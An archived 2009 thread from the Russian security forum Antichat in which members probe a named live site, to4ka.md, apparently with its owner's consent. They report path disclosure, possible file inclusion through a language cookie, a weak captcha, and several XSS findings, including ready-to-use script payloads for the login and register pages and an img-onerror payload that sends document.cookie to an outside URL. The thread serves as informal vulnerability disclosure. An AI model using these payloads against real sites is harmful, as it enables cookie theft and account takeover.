ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
16.04.2009, 01:22
|
|
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме:
3895065
Репутация:
1112
|
|
www.to4ka.md
www.to4ka.md
|
|
|
17.04.2009, 00:32
|
|
Познающий
Регистрация: 14.09.2008
Сообщений: 30
Провел на форуме:
117615
Репутация:
21
|
|
http://to4ka.md/image.php/img_4970f7cf0bf60.jpg?width=127&height=72&croprati o=2:1.1&image=/images/original/img_4970f7cf0bf60.jpg'
пути можно раскрыть (это пока что), вообще на инклуд похоже
|
|
|
|
17.04.2009, 00:45
|
|
Новичок
Регистрация: 16.04.2009
Сообщений: 2
Провел на форуме:
5786
Репутация:
0
|
|
http://to4ka.md/image.php/img_4970f7cf0bf60.jpg?width=127&height=72&croprati o=2:1.1&image=/images/original/img_4970f7cf0bf60.jpg'
пути можно раскрыть (это пока что), вообще на инклуд похоже
Спасибо поправил!
|
|
|
|
17.04.2009, 11:31
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Для ИЕ можно выполнить ХСС атаку загрузив яваскрипт код в картинку, вот пример
http://www.to4ka.md/images/original/img_49e81ca9d64ca.jpg
|
|
|
|
17.04.2009, 17:19
|
|
Новичок
Регистрация: 16.04.2009
Сообщений: 2
Провел на форуме:
5786
Репутация:
0
|
|
Сообщение от Red_Red1
Для ИЕ можно выполнить ХСС атаку загрузив яваскрипт код в картинку, вот пример
http://www.to4ka.md/images/original/img_49e81ca9d64ca.jpg
Спасибо огромное всем кто тестит...
|
|
|
|
17.04.2009, 17:46
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
Уязвима переменная name
login.php?name=1%00'"><ScRiPt%20%0a%0d>alert('XSSK A')%3B</ScRiPt>&pwd=admin@admin.com&next=%D0%B4%D0%B0%D0%B B%D0%B5%D0%B5
/register.php?name=1%00'"><ScRiPt%20%0a%0d>alert('X SSKA')%3B</ScRiPt>&pwd=admin@admin.com&next=%D0%B4%D0%B0%D0%B B%D0%B5%D0%B5
|
|
|
|
28.04.2009, 19:42
|
|
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме:
3895065
Репутация:
1112
|
|
UP
|
|
|
|
18.05.2009, 19:37
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
http://www.to4ka.md/
есть возможность выбора яз: "рус | rom"
там делаетса через js (файл /js/js.js) через ф-цию redirectWithLang
в куках (clang параметр) хранитса текущий яз.
если изменить его (clang) на ,например, rux, тогда увидем пустую страничку
возможно там инклуд)
чтоб убрать ето: сделай дефолтный яз)
|
|
|
|
12.06.2009, 20:05
|
|
Новичок
Регистрация: 28.01.2007
Сообщений: 9
Провел на форуме:
127580
Репутация:
3
|
|
На странице слабая капча. Одинаковые фон, позиция, длина, нет искажения. Можно написать декодер.
UPD: В форме регистрации пассивная XSS. Если ввести <img src=. onerror=document.location='http://www.google.com/search?q='+document.cookie>unexistant_login111 в логин и нажать "Проверить", перекинет на гугл с кукой.
Последний раз редактировалось MasterProg; 12.06.2009 в 20:27..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
